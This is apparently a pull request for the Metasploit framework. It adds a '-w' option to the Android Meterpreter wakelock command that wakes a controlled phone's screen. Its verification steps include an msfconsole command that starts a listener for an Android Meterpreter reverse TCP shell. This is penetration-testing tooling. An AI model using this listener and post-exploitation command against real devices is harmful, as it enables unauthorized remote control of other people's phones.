### PR TITLE
Add android wakelock command to turn the screen on

### DIFF
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -701,6 +701,7 @@ class Console::CommandDispatcher::Android
     wakelock_opts = Rex::Parser::Arguments.new(
       '-h' => [ false, 'Help Banner' ],
       '-r' => [ false, 'Release wakelock' ],
+      '-w' => [ false, 'Turn screen on' ],
       '-f' => [ true, 'Advanced Wakelock flags (e.g 268435456)' ],
     )
 
@@ -713,6 +714,9 @@ class Console::CommandDispatcher::Android
         return
       when '-r'
         flags = 0
+      when '-w'
+        client.android.wakelock(0)
+        flags = 268435482
       when '-f'
         flags = val.to_i
       end


### PR DESCRIPTION
Quick change to add a specific option for turning the screen on with the wakelock. (Note this doesn't unlock the device). The number corresponds to 
https://developer.android.com/reference/android/os/PowerManager.html#ACQUIRE_CAUSES_WAKEUP
+
https://developer.android.com/reference/android/os/PowerManager.html#FULL_WAKE_LOCK

## Verification
- [x] Get an android meterpreter session: `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j`
- [x] Unplug the device and wait for the devices screen to switch off
- [x] Run the command `wakelock -w` and ensure the screen wakes up